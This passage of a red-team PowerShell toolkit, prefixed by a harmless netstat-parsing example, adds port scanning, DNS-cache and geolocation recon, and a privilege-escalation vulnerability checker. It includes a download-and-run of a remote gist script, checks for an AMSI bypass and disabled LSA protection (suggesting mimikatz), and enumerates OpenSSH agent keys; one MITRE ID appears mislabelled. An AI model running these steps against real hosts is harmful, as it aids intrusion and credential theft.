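The `netstat -ano` row parsing done in the ForEach() loop above, as an added example that is not part of the gist: pipeline functions that also cope with the rows the loop drops or mis-splits (IPv6 endpoints such as `[::1]:445`, UDP rows with no State column, the header) and that apply `-Filter` as a regex over the row plus its resolved process name, so a value like `svchost|127.0.0.1` drops both kinds of rows. The function names (`Split-AddressPort`, `ConvertFrom-NetstatLine`, `Get-EstablishedConnection`) and the sample rows (with arbitrary PIDs) are this example's own.

```powershell
function Split-AddressPort {
    # netstat prints 'addr:port'; for IPv6 the address is bracketed, so the port is
    # whatever follows the LAST colon and the brackets are stripped from the address.
    param([Parameter(Mandatory)][string]$Endpoint)
    $i = $Endpoint.LastIndexOf(':')
    $portText = $Endpoint.Substring($i + 1)
    if ($portText -eq '*') { $port = $null } else { $port = [int]$portText }
    [pscustomobject]@{
        Address = $Endpoint.Substring(0, $i).Trim('[', ']')
        Port    = $port
    }
}

function ConvertFrom-NetstatLine {
    # Columns of 'netstat -ano': Proto, Local Address, Foreign Address, [State], PID.
    # UDP rows have no State column, hence the optional group; header and blank
    # lines do not match the pattern and are skipped.
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Line)
    process {
        $pattern = '^\s*(?<proto>TCP|UDP)\s+(?<local>\S+)\s+(?<remote>\S+)\s+(?:(?<state>[A-Z_]+)\s+)?(?<pid>\d+)\s*$'
        if ($Line -match $pattern) {
            $l = Split-AddressPort $Matches.local
            $r = Split-AddressPort $Matches.remote
            [pscustomobject]@{
                Proto         = $Matches.proto
                State         = $Matches.state          # $null for UDP rows
                LocalAddress  = $l.Address
                LocalPort     = $l.Port
                RemoteAddress = $r.Address
                RemotePort    = $r.Port
                OwningProcess = [int]$Matches.pid
            }
        }
    }
}

function Get-EstablishedConnection {
    # Keeps ESTABLISHED rows only, resolves the owning process name, and drops any
    # row whose text (raw line + process name) matches -Filter, mirroring the
    # gist's "delete the full line" semantics.
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string]$Line,
        [string]$Filter = '0\.0\.0\.0:'
    )
    process {
        $row = $Line | ConvertFrom-NetstatLine
        if ($null -eq $row -or $row.State -ne 'ESTABLISHED') { return }
        # A PID that exited between netstat and Get-Process resolves to '<exited>'
        $proc = Get-Process -Id $row.OwningProcess -ErrorAction SilentlyContinue
        if ($proc) { $name = $proc.ProcessName } else { $name = '<exited>' }
        if ("$Line $name" -match $Filter) { return }
        $row | Add-Member -NotePropertyName ProcessName -NotePropertyValue $name -PassThru
    }
}

# Constructed sample of 'netstat -ano' output (PIDs are arbitrary); replace $sample
# with (netstat -ano) to run against the live host.
$sample = @'
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.5:62082      140.82.113.26:443      ESTABLISHED     776
  TCP    127.0.0.1:60919        127.0.0.1:58995        ESTABLISHED     6880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    [::1]:49670            [::1]:49669            ESTABLISHED     4508
  TCP    [fe80::1%8]:49412      [fe80::2%8]:443        ESTABLISHED     4964
  UDP    0.0.0.0:5353           *:*                                    3404
'@ -split "`r?`n"

$sample | Get-EstablishedConnection -Filter '127\.0\.0\.1|::1\]' | Format-Table -AutoSize
```

With that filter the loopback IPv4 and IPv6 rows are removed whole, the LISTENING and UDP rows never pass the State test, and the two remaining ESTABLISHED rows come out with their IPv6 address unbracketed and the port as an integer, which is what the later rules (`$LocalPor -eq 22`, port membership tests) need.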
function Invoke-TCPStats()
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - TCP\IP Statistics Final Table
.OUTPUTS
IPV6 Address Name SentBytes ReceivedBytes SentUnicastBytes ReceivedUnicastBytes SentUnicastPackets
------------ ---- --------- ------------- ---------------- -------------------- ------------------
fe80::8939:e854:6bd9:2c55%8 Wi-Fi 325768937 13457281219 322241183 13452982392 1743601
fe80::8939:e854:6bd9:2c55%8 Ethernet 0 0 0 0 0
#>
echo ""
# Get IPV6 address to colorize output table later
$Interface = (Get-NetIPAddress|Where-Object PrefixOrigin -eq dhcp).InterFaceAlias
$IPv6Addre = ((Get-NetIPAddress -AddressFamily IPv6|Select-Object *)|Where-Object {$_.InterFaceAlias -Match "$Interface"}).IPAddress
Get-NetAdapterStatistics|Select-Object @{Name='IPV6 Address';Expression={"$IPv6Addre"}},Name,SentBytes,ReceivedBytes,SentUnicastBytes,ReceivedUnicastBytes,SentUnicastPackets|Format-Table -AutoSize|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -iMatch "^(--------)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -iMatch "::")
{
@{ 'ForegroundColor' = 'Gray' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
# Group Tag
Write-Host "-=|[" -ForegroundColor Blue -NoNewline
Write-Host "SSA" -ForegroundColor Gray -NoNewline
Write-Host "rEdTeAm" -ForegroundColor Red -NoNewline
Write-Host "@" -ForegroundColor DarkYellow -NoNewline
Write-Host "2025" -ForegroundColor Gray -NoNewline
Write-Host "]|=-" -ForegroundColor Blue
}
function Invoke-ScanTypes()
{
# Scan Type (automatic|manual)
If($ScanType -imatch "automatic")
{
Start-Sleep -Seconds $ScanEach
}
Else
{
cmd /c 'pause'
echo ""
}
}
If($PortScan.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Searchs for TCP high risk [open] ports
.NOTES
Some firewalls are config to drop ICMP [ping]
packets producing false closed ports reports.
.OUTPUTS
RemoteHost Status Proto Port ServiceName HostName
----------- ------ ----- ----- ----------- --------
192.168.1.5 Closed tcp 21 FTP Skynet.home
192.168.1.5 Closed tcp 22 SSH Skynet.home
192.168.1.5 Closed tcp 23 TELNET Skynet.home
192.168.1.5 Closed tcp 80 HTTP Skynet.home
192.168.1.5 Closed tcp 110 POP3 Skynet.home
192.168.1.5 Open tcp 135 EPMAP Skynet.home
192.168.1.5 Open tcp 139 NETBIOS Skynet.home
192.168.1.5 Closed tcp 443 HTTPS Skynet.home
192.168.1.5 Open tcp 445 SMB Skynet.home
192.168.1.5 Closed tcp 8080 APACHE Skynet.home
#>
Clear-Host
$CmdLetAppl = "TCP Port Scanner"
write-host $StartBanner -ForegroundColor DarkRed
echo "" # scantype: maxports,bullet
# Popup is called in-process; it returns 1 for OK, 2 for CANCEL and -1 on the 7 second timeout
$MsgBoxReturnCode = (New-Object -ComObject Wscript.Shell).Popup("Warning: Some firewalls are configured to drop ICMP`n[ping] packets, producing false 'closed' port reports",7,"ScanTCP - $CmdletVersion - $CmdLetAppl",1+48)
If($MsgBoxReturnCode -eq 2) # CANCEL button pressed in MsgBox
{
Write-Host "`n[" -NoNewline
Write-Host "x" -ForegroundColor Red -NoNewline
Write-Host "] " -NoNewline
Write-Host "Port Scan Aborted [CANCEL] by User" -ForegroundColor Red
Invoke-TCPStats
return
}
# The helper script is fetched from a raw gist URL pinned to a specific commit, so its
# content cannot change silently; still review it before running it from an elevated
# prompt. iwr -OutFile writes nothing to the pipeline, so Unblock-File takes the path explicitly
iwr -Uri "https://gist.githubusercontent.com/r00t-3xp10it/4f462362e54e33a52634719cd5e9dac4/raw/1b0cee4ab73a74abddb39fcfd7b82edd6ddba486/PingSweep.ps1" -OutFile "PingSweep.ps1" -UseBasicParsing
Unblock-File -Path "PingSweep.ps1"
.\PingSweep.ps1 -iprange "$IP" -scantype 'maxports'
Remove-Item -Path "PingSweep.ps1" -Force
# Final statistics and BalloonTip
Invoke-TCPStats
Invoke-BallonTip
return
}
If($DLL.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Search for DLLs loaded by running processes
.NOTES
This function only scans running processes
.OUTPUTS
Name : AMDRSSrcExt
Id : 26276
StartTime : 13/10/2025 17:22:42
Description : Radeon Settings: Source Extension
Path : C:\Program Files\AMD\CNext\CNext\AMDRSSrcExt.exe
Modules : {ntdll.dll, KERNEL32.DLL, KERNELBASE.dll, USER32.dll...}
Name : UserOOBEBroker
Id : 22804
StartTime : 13/10/2025 17:17:45
Description : User OOBE Broker
Path : C:\Windows\System32\oobe\UserOOBEBroker.exe
Modules : {ntdll.dll, KERNEL32.DLL, KERNELBASE.dll, ADVAPI32.dll...}
#>
Clear-Host
$CmdLetAppl = "DLLs search"
write-host $StartBanner -ForegroundColor DarkRed
write-host "Search for DLLs loaded by running processes" -ForegroundColor Green
write-host "`n`nModule Description"
write-host "------ -----------" -ForegroundColor Blue
write-host "Get-All Print all running processes"
write-host "Get-Dll Print all processes that load DLLs"
write-host "Get-Pro Search loaded DLLs by process name"
write-host "Get-Pid Search loaded DLLs by process PID`n`n"
write-host "[ScanDLL]" -NoNewline
write-host ": " -ForegroundColor Blue -NoNewline
$Choise = Read-Host
If($Choise -iMatch "Get-All")
{
# Print ALL running processes info
$LoadedDLLs = ((Get-Process -Name "*"|Select-Object *|Where-Object {
$_.Responding -Match "True" -and $_.Modules -ne ""}|
Select-Object Name,Id,Responding,ProductVersion,StartTime,Path,@{Name='Modules';Expression={(Get-Process -Id $_.Id).Modules.ModuleName|
Where-Object{$_ -iNotMatch ".exe"}}}|Format-List))
If($LoadedDLLs)
{
Write-Host "Action : " -ForegroundColor Blue -NoNewline
Write-Host "Print all running processes"
Start-Sleep -Milliseconds 1500
echo $LoadedDLLs|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -Match "^(----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -iMatch "^(Id)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
}
Else
{
Write-Host "`n[" -NoNewline
Write-Host "x" -ForegroundColor Red -NoNewline
Write-Host "] ERROR: " -NoNewline
Write-Host "No running processes found.`n" -ForegroundColor Red
return
}
}
ElseIf($Choise -iMatch "Get-Dll")
{
# Print ALL running processes that loaded DLLs
$LoadedDLLs = ((Get-Process -Name "*"|Select-Object *|Where-Object {
$_.Responding -Match "True" -and $_.Modules.ModuleName -iMatch "(.dll)$"}|
Select-Object Name,Id,StartTime,Description,Path,@{Name='Modules';Expression={(Get-Process -Id $_.Id).Modules.ModuleName|
Where-Object{$_ -iNotMatch ".exe"}}}|Format-List))
If($LoadedDLLs)
{
Write-Host "Action : " -ForegroundColor Blue -NoNewline
Write-Host "Print all processes that loaded DLLs"
Start-Sleep -Milliseconds 1500
echo $LoadedDLLs|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -Match "^(----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -iMatch "^(Id)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
}
Else
{
Write-Host "`n[" -NoNewline
Write-Host "x" -ForegroundColor Red -NoNewline
Write-Host "] ERROR: " -NoNewline
Write-Host "No processes with loaded DLLs found.`n" -ForegroundColor Red
return
}
}
ElseIf($Choise -iMatch "Get-pro")
{
# Search loaded DLLs by process name
write-host "Input ProcessName: " -ForegroundColor Blue -NoNewline
$APPLtOsEARCH = Read-Host
If([string]::IsNullOrEmpty($APPLtOsEARCH))
{
$APPLtOsEARCH = "svchost"
}
$LoadedDLLs = ((Get-Process -Name "$APPLtOsEARCH"|Select-Object *|Where-Object {
$_.Responding -Match "True" -and $_.Modules.ModuleName -iMatch "(.dll)$"}|
Select-Object Name,Id,StartTime,Description,Path,@{Name='Modules';Expression={(Get-Process -Id $_.Id).Modules.ModuleName|
Where-Object{$_ -iNotMatch ".exe"}}}|Format-List))
If($LoadedDLLs)
{
Write-Host "ProcessName : " -ForegroundColor Blue -NoNewline
Write-Host "$APPLtOsEARCH " -NoNewline
Write-Host "[found]" -ForegroundColor Green
Write-Host "Action : " -ForegroundColor Blue -NoNewline
Write-Host "Print all processes that loaded DLLs"
Start-Sleep -Seconds 2
echo $LoadedDLLs|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -Match "^(----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -iMatch "^(Id)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
}
Else
{
Write-Host "`n[" -NoNewline
Write-Host "x" -ForegroundColor Red -NoNewline
Write-Host "] ERROR: " -NoNewline
Write-Host "No DLLs loaded by $APPLtOsEARCH found.`n" -ForegroundColor Red
return
}
}
ElseIf($Choise -iMatch "Get-pid")
{
# Search loaded DLLs by process PID
write-host "Input Process PID: " -ForegroundColor Blue -NoNewline
$DLLPID = Read-Host
# Only resolve numeric input: Get-Process -Id '' is a parameter-binding error that -EA can not suppress
$PidLoa = $null
If($DLLPID -Match '^\d+$')
{
$PidLoa = (Get-Process -Id ([int]$DLLPID) -EA SilentlyContinue).ProcessName
}
If([string]::IsNullOrEmpty($PidLoa))
{
write-host "`n[" -NoNewline
write-host "x" -ForegroundColor Red -NoNewline
write-host "] ERROR: " -NoNewline
write-host "No process with PID $DLLPID found running`n" -ForegroundColor Red
return
}
# Query the exact PID (a regex -Match on $_.Id would also hit 123 when asked for 12)
$LoadedDLLs = (Get-Process -Id ([int]$DLLPID) -EA SilentlyContinue|Where-Object {
$_.Responding -Match "True" -and $_.Modules.ModuleName -iMatch "(.dll)$"}).Modules|
Select-Object Size,ModuleName,FileName
If($LoadedDLLs)
{
Write-Host "ProcessName : " -ForegroundColor Blue -NoNewline
Write-Host "$PidLoa " -NoNewline
Write-Host "[found]" -ForegroundColor Green
Write-Host "Action : " -ForegroundColor Blue -NoNewline
Write-Host "Print all DLLs loaded and paths"
Start-Sleep -Seconds 2
echo $LoadedDLLs|Format-Table -AutoSize|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -Match "(----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -Match "($PidLoa.exe)")
{
@{ 'ForegroundColor' = 'Green' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
}
Else
{
Write-Host "`n[" -NoNewline
Write-Host "x" -ForegroundColor Red -NoNewline
Write-Host "] ERROR: " -NoNewline
Write-Host "No DLLs loaded by Id: $DLLPID found`n" -ForegroundColor Red
return
}
}
Else
{
write-host "`n[" -NoNewline
write-host "x" -ForegroundColor Red -NoNewline
write-host "] ERROR: " -NoNewline
write-host "Wrong ScanDLL choice input.`n" -ForegroundColor Red
return
}
# Invoke BallonTip
Invoke-BallonTip
return
}
If($Dns.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Get device DNS Resolver cache
.OUTPUTS
[+] Display SKYNET DNS Resolver Cache
[*] OS:Microsoft Windows NT 10.0.26100.0
[*] Mac Address: B8-1E-A4-EE-91-C3
[*] Interface: WiFi
RecordName IP4Address IP6Address
---------- ---------- ----------
a124.dscd.akamai.net 95.95.253.137
a1666.dscr.akamai.net 2.23.103.97
a1856.dspw65.akamai.net 95.95.253.201
eu2-autoupdate.opera.com 82.145.216.46
eu2-autoupdate.opera.com 2001:4c28:1:430:82:145:216:20
paRT-0014.t-0009.FB-t-mseDge.net 2620:1ec:48:1::42
www.google.CoM 216.58.209.68
www.gstatic.com 142.250.200.67
www.tm.v4.a.prd.aadg.akadns.net 20.190.181.23
[?] Flush DNS Resolver Cache? (yes|no):
#>
Clear-Host
$CmdLetAppl = "Dns Resolver"
write-host $StartBanner -ForegroundColor DarkRed
$OsStrings = ([System.Environment]::OSVersion).VersionString
$InterFace = (Get-NetIPAddress|Where-Object PrefixOrigin -eq dhcp).InterFaceAlias
$MacAddres = (Get-NetAdapter|Where-Object {$_.Name -Match "^($InterFace)$"}).MacAddress
Write-Host "`n[" -NoNewline
Write-Host "+" -ForegroundColor Blue -NoNewline
Write-Host "] " -NoNewline
Write-Host "Display $Env:COMPUTERNAME DNS Resolver Cache" -ForegroundColor Blue
Write-Host "[" -NoNewline
Write-Host "*" -ForegroundColor Green -NoNewline
Write-Host "] OS:$OsStrings"
Write-Host "[" -NoNewline
Write-Host "*" -ForegroundColor Green -NoNewline
Write-Host "] Mac Address: $MacAddres"
Write-Host "[" -NoNewline
Write-Host "*" -ForegroundColor Green -NoNewline
Write-Host "] Interface: $InterFace"
Start-Sleep -Seconds 2
echo ""
## Remove duplicated lines: |Sort-Object -unique
# Get-DnsClientCache|Select-Object *|findstr /V "TTL CimInstanceProperties PSComputerName InstanceID Description Section Status Type Caption ElementName CimSystemProperties CimClass"|Format-List
$ReportDns = (ipconfig /displaydns|Select-String -Pattern "Record Name") -replace '^\s+',' '|Sort-Object -unique
# DNS RESOLVER CACHE - TABLE
$WhoIstable = New-Object System.Data.DataTable
$WhoIstable.Columns.Add("RecordName")|Out-Null
$WhoIstable.Columns.Add("IP4Address")|Out-Null
$WhoIstable.Columns.Add("IP6Address")|Out-Null
ForEach($WhoisLookup in $ReportDns)
{
# Parsing data from $ReportDns
$Sanitize = $WhoisLookup -replace ' Record Name . . . . . : ',''
# Resolve hostname to IP4Address and IP6Address (silently: stale cache entries often no longer resolve)
$LookUP_ = (Resolve-DNSName "$Sanitize" -EA SilentlyContinue|Select-Object Name,IP4Address,IP6Address|Sort-Object -unique|Format-List)
If(-not([string]::IsNullOrEmpty($LookUP_)))
{
$_IP6Add = ($LookUP_|findstr /C:"IP6Address") -replace 'IP6Address : ',''
$_IP4Ad_ = ($LookUP_|findstr /C:"IP4Address") -replace 'IP4Address : ',''
$_Names_ = ($LookUP_|findstr /C:"Name") -replace 'Name : ',''
## Adding values to output DataTable!
$WhoIstable.Rows.Add("$_Names_", ## name
"$_IP4Ad_", ## IP4Address
"$_IP6Add" ## IP6Address
)|Out-Null
}
}
## Display DNS resolver cache OnScreen
echo $WhoIstable|Format-Table -AutoSize
# Append to logfile ?
If($Logfile.IsPresent)
{
Write-Host "[" -NoNewline
Write-Host ">" -ForegroundColor Green -NoNewline
Write-Host "] logfile:" -NoNewline
Write-Host "'$pwd\$LogName'" -ForegroundColor Green
echo $ReportDns >> $LogName
}
# flush dns resolver cache ?
write-host "[" -NoNewline
write-host "?" -ForegroundColor Yellow -NoNewline
$Question = Read-Host "] Flush DNS Resolver Cache? (yes|no)"
If($Question -iMatch '^(y|yes)$')
{
ipconfig /flushdns
}
# Invoke ballontip
Invoke-BallonTip
return
}
If($GeoLocation.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Retrieve device geo-location
.NOTES
This function uses the ipapi.co API, which has
a daily limit on the number of queries we can perform.
.OUTPUTS
External IP city country latitude longitude Organization
----------- ---- ------- -------- --------- ------------
253.93.174.123 Lisbon Portugal 38.7219 -9.1398 Nos Comunicacoes, S.A.
[+] GoogleMaps: https://www.google.com/maps/dir/@38.7219,-9.1398
#>
Clear-Host
$CmdLetAppl = "GeoLocation"
write-host $StartBanner -ForegroundColor DarkRed
# Build GeoLocation DataTable!
$geotable = New-Object System.Data.DataTable
$geotable.Columns.Add("External IP")|Out-Null
$geotable.Columns.Add("city")|Out-Null
$geotable.Columns.Add("country")|Out-Null
$geotable.Columns.Add("latitude")|Out-Null
$geotable.Columns.Add("longitude")|Out-Null
$geotable.Columns.Add("Organization")|Out-Null
# Gets the IPv4 or IPv6 external IP address (-UseBasicParsing avoids the IE engine dependency)
$PublicAddr = ((Invoke-WebRequest -Uri "http://ifconfig.me/ip" -UseBasicParsing).Content).Trim()
# IPv6 check: hex groups separated by colons, allowing the empty group of a '::' shortcut
If(($PublicAddr -Match '^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})$') -Or ($PublicAddr -Match '^([0-9A-Fa-f]{0,4}:){2,7}[0-9A-Fa-f]{0,4}$'))
{
# Get GeoLocation using https://ipapi.co
$GeoLocation = (Invoke-WebRequest -Uri "https://ipapi.co/$PublicAddr/json/" -UseBasicParsing).RawContent|
findstr /C:"city" /C:"region" /C:"country_" /C:"latitude" /C:"longitude" /C:"org"|
findstr /V "iso3 tld calling area population region_code country_code"
# 429 HTTPS statuscode = ipapi.co quota reached
If($GeoLocation -Match '^(True)$')
{
<#
.NOTES
http://ipinfo.io does not have a quota limit
but it is less accurate than http://ipapi.co
.OUTPUTS
External IP city country latitude longitude org
----------- ---- ------- -------- --------- ---
213.22.159.133 Porto PT 41.1496 -8.6110 AS2860 NOS COMUNICACOES, S.A.
[+] Uri: https://www.google.com/maps/dir/@41.1496,-8.6110
#>
Write-Host "`n[" -NoNewline
Write-Host "`x" -ForegroundColor Red -NoNewline
Write-Host "] https://ipapi.co: " -NoNewline
Write-Host "number of requests by day reached." -ForegroundColor Red
Start-Sleep -Seconds 2
Write-Host "[" -NoNewline
Write-Host "+" -ForegroundColor Blue -NoNewline
Write-Host "] Resolving with http://ipinfo.io [less accurate]`n"
Start-Sleep -Seconds 1
# Split() coordinate values into two strings to build table later
$GeoDateLoc = (Invoke-WebRequest -Uri "http://ipinfo.io" -UseBasicParsing).Content|findstr /C:"loc"
$Coordinates = $GeoDateLoc -replace '"','' -replace 'loc:','' -replace '(,)$','' -replace '(^\s+|\s+$)',''
$latitude = ($Coordinates -split(',')|Select-Object -First 1)
$longitude = ($Coordinates -split(',')|Select-Object -Last 1)
# Make sure the @latitude value its not empty
If(([string]::IsNullOrEmpty($latitude)) -Or ($latitude -Match "^(True)$"))
{
Write-Host "[" -NoNewline
Write-Host "`x" -ForegroundColor Red -NoNewline
Write-Host "] http://ipinfo.io: " -NoNewline
Write-Host "unable to resolve geo-location.`n" -ForegroundColor Red
return
}
# Get GeoLocation using http://ipinfo.io (reuse the public address already resolved above)
Invoke-RestMethod -Uri "http://ipinfo.io/$PublicAddr"|
Select-Object @{Name='External IP';Expression={"$PublicAddr"}},city,country,@{Name='latitude';Expression={"$latitude"}},@{Name='longitude';Expression={"$longitude"}},org|Format-Table -AutoSize
# GoogleMaps API
write-host "[" -NoNewline
write-host "+" -ForegroundColor Blue -NoNewline
write-host "] GoogleMaps: " -NoNewline
write-host "https://www.google.com/maps/dir/@$Coordinates`n" -ForegroundColor Green
# BaloonTip
Invoke-BallonTip
return
}
}
Else
{
Write-Host "`n[" -NoNewline
Write-Host "x" -ForegroundColor Red -NoNewline
Write-Host "] http://ifconfig.me: " -NoNewline
Write-Host "Unable to retrieve public IP address.`n" -ForegroundColor Red
return
}
# Parsing raw data
$GeoDate = $GeoLocation -replace '"','' -replace ',','' -replace '(^\s+|\s+$)',''
$Moreati = $Geodate -replace '(city: |region: |country_name: |country_capital: |latitude: |longitude: |org: )',''
$city = $Moreati[0] ## city
$cnam = $Moreati[2] ## country_name
$lati = $Moreati[4] ## latitude
$long = $Moreati[5] ## longitude
$Orgs = $Moreati[6] ## organization
# Adding values to DataTable!
$geotable.Rows.Add("$PublicAddr", ## PublicIP
"$city", ## city
"$cnam", ## country_name
"$lati", ## latitude
"$long", ## longitude
"$Orgs" ## organization
)|Out-Null
# Display Data Table OnScreen
$geotable|Format-Table -AutoSize
# GoogleMaps API
write-host "[" -NoNewline
write-host "+" -ForegroundColor Blue -NoNewline
write-host "] GoogleMaps: " -NoNewline
write-host "https://www.google.com/maps/dir/@$lati,$long`n" -ForegroundColor Green
## BaloonTip
Invoke-BallonTip
return
}
If($Mitre.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Search for possible MITRE vulnerabilities
.OUTPUTS
VulnId : TermService [Mitre T1021]
Service : Stopped
DLLstatus : Unknown
VulnStatus : NON VULNERABLE
VulnId : Unquoted Service Path [Mitre T1574]
FolderPath : C:\Program Files\Google\Play Games Services\25.8.551.0\Service\GooglePlayGamesServices.exe
StartName : LocalSystem
StartMode : Auto
VulnStatus : VULNERABLE
VulnId : Juicy potato golden privileges [Mitre TA0004]
*NOTES : Requires 2 Enabled privileges and BITS service
CLSID identifier to be vulnerable to escalation
-----------------------------------------------
PrivilegeName : SeAssignPrimaryTokenPrivilege
BITS CLSID : {69AD4AEE-51BE-439b-A92C-86AE490E8B30}
State : Enabled
Return : VULNERABLE
PrivilegeName : SeImpersonatePrivilege
BITS CLSID : {69AD4AEE-51BE-439b-A92C-86AE490E8B30}
State : Disabled
Return : NON VULNERABLE
-----------------------------------------------
VulnStatus : NON VULNERABLE
VulnId : Weak Directory permissions [Mitre T1222]
FolderPath : C:\Program Files (x86)\StarCraft II\Versions\Base94137
FileSystemRights : FullControl
IdentityReference : BUILTIN\\Users
IsInherited : True
VulnStatus : VULNERABLE
#>
Clear-Host
$CmdLetAppl = "Mitre ATT&CK"
write-host $StartBanner -ForegroundColor DarkRed
Write-Host "`n`n -|[ MITRE ATT&CK VULNERABILITY SCANNER ]|-`n" -ForegroundColor Green
Start-Sleep -Seconds 2
$PS2Version = ""
## [CHECK FOR POWERSHELL VERSION 2]
Write-Host "VulnId : Powershell v2 Engine [amsi bypass]"
Start-Sleep -Milliseconds 1000
$RegistryPaths = @(
"Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine",
"Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\2\PowerShellEngine",
"Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine"
)
ForEach($TokenID in $RegistryPaths)
{
$PS2Version = (Get-ItemProperty -Path "$TokenID" -Name PowerShellVersion -EA SilentlyContinue).PowerShellVersion
If($PS2Version -Match "2.0")
{
$Location = $TokenID -replace "Registry::",""
break
}
}
If($PS2Version -Match "2.0")
{
Write-Host "Powershell V2 : $PS2Version"
Write-Host "RegPath : $Location"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
Else
{
Write-Host "Powershell V2 : Not Found"
Write-Host "RegPath : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
## [Check UAC settings]
Write-Host "`nVulnId : UAC settings [Mitre T1052]"
Start-Sleep -Milliseconds 1000
$POSD = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System').PromptOnSecureDesktop
$CPBA = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System').ConsentPromptBehaviorAdmin
$Report = "Unknown" # default for value pairs that are not one of the four known UAC levels
If($CPBA -eq 0 -and $POSD -eq 0){$Report = "Never notify"}
If($CPBA -eq 2 -and $POSD -eq 1){$Report = "Always notify"}
If($CPBA -eq 5 -and $POSD -eq 1){$Report = "Notify me only when apps try to make changes"}
If($CPBA -eq 5 -and $POSD -eq 0){$Report = "Notify me only when apps try to make changes (do not dim my desktop)"}
If([string]::IsNullOrEmpty($CPBA)){$Report = "Unknown"}
If([string]::IsNullOrEmpty($POSD)){$Report = "Unknown"}
If((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System').EnableLUA -eq 1)
{
Write-Host "EnableLUA : 1 [enabled]"
Write-Host "Status : $Report"
Write-Host "VulnStatus : " -NoNewline
If($Report -iMatch "^(Never notify)$")
{
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 700
}
Else
{
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
}
Else
{
Write-Host "EnableLUA : 0 [disabled]"
Write-Host "Status : Never notify"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
}
## [LSA Protection - UEFI]
Start-Sleep -Milliseconds 1000
Write-Host "`nVulnId : LSA Protection [Mitre TA0005]"
$RunAsPPL = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\LSA').RunAsPPL
$AsPPLBot = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\LSA').RunAsPPLBoot
If(-not([string]::IsNullOrEmpty($RunAsPPL)))
{
If($RunAsPPL -eq 0)
{
Write-Host "LSA protection : $RunAsPPL [disabled]"
Write-Host "RunAsPPLBoot : $AsPPLBot [UEFI]"
Write-Host "Status : LSA Protection Disabled. Try mimikatz"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
}
ElseIf($RunAsPPL -eq 1)
{
Write-Host "LSA protection : $RunAsPPL [enabled]"
Write-Host "RunAsPPLBoot : $AsPPLBot [UEFI]"
Write-Host "Status : LSA Enabled with UEFI Lock"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
ElseIf($RunAsPPL -eq 2)
{
Write-Host "LSA protection : $RunAsPPL [enabled]"
Write-Host "RunAsPPLBoot : $AsPPLBot [UEFI]"
Write-Host "Status : LSA Enabled without UEFI Lock"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
}
Else
{
Write-Host "LSA protection : Unknown"
Write-Host "RunAsPPLBoot : $AsPPLBot [UEFI]"
Write-Host "Status : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
[int]$Count='0'
## [OpenSSH Keys]
Start-Sleep -Milliseconds 1300
If(Test-Path -Path "HKCU:\Software\OpenSSH\Agent\Keys")
{
$KeysDB = $(reg query 'HKCU\Software\OpenSSH\Agent\Keys')|Where-Object {$_ -ne ""}
ForEach($Key in $KeysDB)
{
$splitKey = ($Key -split("\\")|Select-Object -Last 1)
Write-Host "`nVulnId : OpenSSH Keys [Mitre T1098]"
Write-Host "Location : HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys"
Write-Host "OpenSSH Key : $splitKey"
